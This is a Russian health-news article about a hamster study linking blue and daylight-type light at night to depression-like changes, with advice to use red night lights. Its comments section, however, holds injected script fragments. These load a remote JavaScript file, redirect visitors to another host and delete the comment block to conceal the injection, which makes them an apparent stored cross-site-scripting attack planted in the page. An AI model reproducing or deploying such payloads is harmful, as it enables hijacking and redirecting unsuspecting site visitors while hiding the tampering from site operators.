Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Какого цвета ваша ночь? Н...  >>  Какого цвета ваша ночь? Неправильный свет вызывает депрессию
 
Обратная связь
 

Какого цвета ваша ночь? Неправильный свет вызывает депрессию

Размер шрифта
01 октября 2013 00:00
Юрий Малышев
Здоровье инфо
Полина Калинина
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые утверждают, что от света в спальне зависит ваше здоровье!

Какого цвета ваша ночь? Неправильный свет вызывает депрессию

Исследование, проведенное на хомяках, показало, что голубой свет – один из самых неблагоприятных для нашего настроения после дневного света.

Голубой и дневной свет вызывали у хомяков симптомы и изменения в мозге, подобные таковым при депрессии, чего практически не наблюдалось при красном свете или в отсутствие света.

«Эти результаты могут быть применимы и для людей, особенно для тех, кто работает в ночную смену», – говорит Рэнди Нельсон, один из авторов исследования и профессор неврологии и психологии Университета Огайо. «Сон при красном свете мог бы быть здоровой альтернативой ночному сну».

В исследовании изучались особые фоточувствительные клетки сетчатки глаза (ipRGC), которые регистрируют свет в окружающей среде и посылают сигналы в зону мозга, регулирующую циркадные ритмы. Они представляют собой суточные колебания биологических процессов, связанных со сменой дня и ночи. Также есть данные о том, что фоточувствительные клетки посылают сигналы в зоны мозга, отвечающие за настроение и эмоции. Некоторые исследователи считают, что ночная работа в условиях искусственного освещения может приводить к развитию депрессии.

Что творили с хомяками

Считается, что фоточувствительные клетки по-разному реагируют на свет разной длины волны. Наибольший ответ вызывает голубой свет, а наименьший – красный. Ученые пытались выяснить воздействие света разной длины волны на хомяков.

В ходе эксперимента взрослых самок сибирского хомяка разделили на четыре группы и каждой группе включали различный свет в ночное время в течение четырех недель: тусклый красный свет, тусклый голубой свет, свет, максимально приближенный к дневному, а последнюю группу просто оставляли при ночном свете. Депрессия у животных оценивалась по употреблению ими сладкой воды – одного из любимых лакомств.

Оказалось, что хомяки, содержавшиеся при ночном и красном свете, употребляли одинаково высокое количество сладкой воды (вторые чуть меньше). Те животные, которые находились при дневном и голубом свете, пили значительно меньше жидкости.

После эксперимента ученые исследовали гиппокамп (участок мозга) хомяков. У грызунов, державшихся при дневном и голубом свете, обнаружилось значительное уменьшение дендритов (коротких отростков клеток, по которым передаются сигналы) по сравнению с остальными хомяками. Считается, что данный признак взаимосвязан с депрессией.

Улучшаем свою жизнь с помощью света

На основании поведенческих и морфологических изменений исследователи пришли к выводу, что характер света влияет на настроение. Наиболее неблагоприятное воздействие на животных оказывал голубой свет, на втором месте – дневной. Ночной свет (полная темнота) оказался самым полезным для грызунов, после него с небольшим отрывом шел красный свет.

Ученые считают, что результаты справедливы и для человека. Они советуют нам ограничить использование телевизора, компьютера и других приборов, излучающих свет, в ночное время. Если вы подумываете о ночной лампе, то предпочтительнее выбрать лампу красного цвета, а не белого.

Исследование было опубликовано в журнале «Неврология»  (« Journal of Neuroscience»).

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:02

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 23:01

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Все что надо знать о бронхите   Ученые говорят, что свекровь может испортить вам жизнь после родов! Как жить?   Грустно? Вспомнили что-то плохое? Вот как бороться с плохим настроением!   Посадите родителей в интернет! Он борется с депрессией!  
03 июня 2013Недосып лечит депрессию. Сколько спать, чтобы не сойти с ума? 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Еда и лекарства: когда их нельзя смешивать
Чем полезен секс?
Как студенческая жизнь влияет на здоровье

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.